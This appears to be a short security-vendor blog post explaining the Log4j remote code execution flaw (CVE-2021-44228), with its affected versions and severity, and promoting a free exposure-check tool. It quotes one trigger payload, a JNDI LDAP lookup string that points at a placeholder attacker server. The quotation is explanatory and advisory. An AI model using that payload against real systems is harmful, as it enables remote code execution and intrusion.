fbpx

What is Log4j vulnerability? Do you need to worry?

Findings VDP | log4j mitigation
Supply Chain Security

Share This Post

Share on linkedin
Share on twitter
Share on email
Share on whatsapp

Log4j vulnerability,  CVE-2021-44228, became public on December 9, 2021.

This easily triggered log4j vulnerability can be used to gain RCE (remote code execution) in vulnerable systems when the Apache Log4j utility is used. Other Apache products are vulnerable as well, such as Apache Solr.

 

Log4j is easily triggered just by log a special string {jndi:ldap://<attacker’s server>/a}; it impacts Apache Log4j version 2.0-beta9 to 2.15.0-rc, and is common in enterprise software and cloud servers across industry. Unless fixed, it enables easy access to internal networks that can end up with valuable data theft, malware implementation, crucial information deletion, and more.

 

This vulnerability is so critical, that it received the rare 10 out of 10 CVSS scores.

 

Fortunately, not everyone is affected, and mitigation can be easily applied, but first, it is recommended to check if you have been exposed to log4j easily, using Findings’ log4j free VDaaS tool.

 

For more information, feel free to visit our log4j information page

Subscribe To Our Blog

Get updates and learn from the Industry Leaders

More To Explore

Scale up your 3rd party risk verification and management

Start with our FREE account